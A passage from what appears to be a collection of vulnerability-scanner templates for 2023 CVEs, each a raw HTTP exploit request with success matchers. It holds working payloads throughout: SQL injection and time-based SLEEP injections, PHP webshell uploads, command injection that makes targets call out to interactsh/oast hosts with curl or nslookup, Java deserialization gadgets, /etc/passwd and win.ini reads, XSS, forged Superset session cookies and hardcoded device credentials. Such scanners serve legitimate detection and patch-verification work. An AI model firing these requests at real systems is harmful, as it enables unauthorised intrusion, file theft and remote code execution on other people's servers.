SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40oast.me&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-37629","info":{"name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","severity":"critical"},"requests":[{"raw":["POST /pig/add-pig.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigno\"\n\npig-fms-100\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"weight\"\n\n65465\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"arrived\"\n\n{{date_time(\"%Y-%M-%D\")}}\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"gender\"\n\nfemale\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"status\"\n\nactive\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"breed\"\n\n2\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"remark\"\n\n4fwefwe\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigphoto\"; filename=\"{{rand_base(5)}}\".php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"submit\"\n\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(content_type, \"text/html\")","contains(body, \"successfully created\")"],"condition":"and"}]}]},{"id":"CVE-2023-36845","info":{"name":"Juniper J-Web - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?PHPRC=/dev/fd/0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauto_prepend_file=\"/etc/passwd\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["Juniper"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"oast.me"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://oast.me/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-5914","info":{"name":"Citrix StoreFront - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/Citrix/teststoreAuth/SamlTest"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(1)</script>\", \"XmlException\")"],"condition":"and"}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-34751","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&page=groups&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-28662","info":{"name":"Wordpress Gift Cards <= 4.3.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Gift Vouchers and Packages"]}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, 'critical error')"],"condition":"and"}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-52251","info":{"name":"Kafka UI 0.7.1 Command Injection","severity":"high"},"requests":[{"raw":["GET /api/clusters HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"cluster-name","internal":true,"json":[".[0].name"]}]},{"raw":["GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"topic-name","internal":true,"json":[".topics[].name"]}]},{"raw":["@timeout 20s\nGET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Assigning partitions"]}]}]},{"id":"CVE-2023-47253","info":{"name":"Qualitor <= 8.20 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"ipconfig\"); HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Windows\",\"DNS\")","contains(content_type,\"text/javascript\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-29506","info":{"name":"XWiki >= 13.10.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wiki-xwiki\"onload=\"alert(document.domain)\"","resetPasswordForm"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6989","info":{"name":"Shield Security WP Plugin <= 18.5.9 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"dashboard_shield\"","\"shield_action\"","\"search_shield\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3380","info":{"name":"WAVLINK WN579X3 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","words":["images/WAVLINK-logo.png","<title>Wi-Fi APP Login</title>"],"condition":"and","internal":true}]},{"raw":["POST /cgi-bin/adm.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/ping.shtml\n\npage=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3578","info":{"name":"DedeCMS 5.7.109 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"response","words":["DedeCms"],"case-insensitive":true}]},{"raw":["GET /co_do.php?rssurl=https://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]}]}]},{"id":"CVE-2023-5244","info":{"name":"Microweber < V.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"alert(document.domain)\", \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2023-34105","info":{"name":"SRS - Command Injection","severity":"high"},"requests":[{"raw":["POST /api/v1/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"action\":  \"on_publish\", \"app\":  \"`nslookup {{interactsh-url}}`\", \"stream\":\"foo\", \"vhost\": \"foo\", \"client_id\":\"foo\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"code\":","data\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37645","info":{"name":"EyouCms v1.6.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/model/custom_model_path/recruit.filelist.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["application/admin/","template/pc/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47115","info":{"name":"Label Studio - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/signup/?&next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","POST /api/users/{{id}}/avatar/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF\n\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\nContent-Disposition: form-data; name=\"avatar\"; filename=\"nuclei.html\"\nContent-Type: image/png\n\n{{hex_decode(\"89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E\")}}\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","GET {{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"xpath","name":"csrftoken","internal":true,"attribute":"value","xpath":["/html/body/div/form/input"]},{"type":"json","part":"body","name":"id","internal":true,"json":[".id"]},{"type":"json","part":"body","name":"filename","internal":true,"json":[".avatar"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, 'text/html')","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4116","info":{"name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Passengers\", \"Drop-off address\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-5830","info":{"name":"ColumbiaSoft DocumentLocator - Improper Authentication","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /api/authentication/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\n  \"LoginType\":\"differentWindows\",\n  \"User\":\"{{randstr}}\",\n  \"Password\":\"{{rand_base(5, \"abc\")}}\",\n  \"Domain\":\"{{randstr}}\",\n  \"Server\":\"{{interactsh-url}}\",\n  \"Repository\":\"{{randstr}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"Authorized\":false"]}]}]},{"id":"CVE-2023-4521","info":{"name":"Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML and RSS Feeds"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-34753","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-41642","info":{"name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: </span><script>alert(document.domain)</script>\n\n__EVENTTARGET=T1bPulsantiera&EVENTARGUMENT=TlbPulsantiera_Item_0%3AUP&___VIEWSTATE='TESTING&LeftArea%3ALeftMenu_hidden=&T1bPulsantiera_CancelClick=false&TlbPulsantiera_hidden=&cbUtente=&txtDataRichiestaDa=&txtDataRichiestaA=&TopArea%3ATopMenu=\n","GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: </span><script>alert(document.domain)</script>\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","Invalid_Viewstate"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33405","info":{"name":"BlogEngine CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/default.aspx?years=http://oast.pro"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-2059","info":{"name":"DedeCMS 5.7.87 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\\..\\..\\ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["dirname(__FILE__)","$cfg_basedir","dedecms"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39109","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-49070","info":{"name":"Apache OFBiz < 18.12.10 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?>\n  <methodCall>\n    <methodName>{{randstr}}</methodName>\n    <params>\n      <param>\n      <value>\n        <struct>\n       <member>\n          <name>test</name>\n          <value>\n      <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}</serializable>\n          </value>\n        </member>\n      </struct>\n      </value>\n    </param>\n    </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<name>faultString</name>"]}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2779","info":{"name":"Super Socializer < 7.13.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"facebook_urls\")"],"condition":"and"}]}]},{"id":"CVE-2023-33629","info":{"name":"H3C Magic R300-2100M - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goform/aspForm HTTP/1.1\nHost: {{Hostname}}\n\nCMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/{{filename}});\n","GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(body_1, 'do_cmd.asp')","status_code_2 == 200","contains_all(body_2, 'www', 'www_multi')"],"condition":"and"}]}]},{"id":"CVE-2023-5003","info":{"name":"Active Directory Integration WP Plugin < 4.1.10 - Log 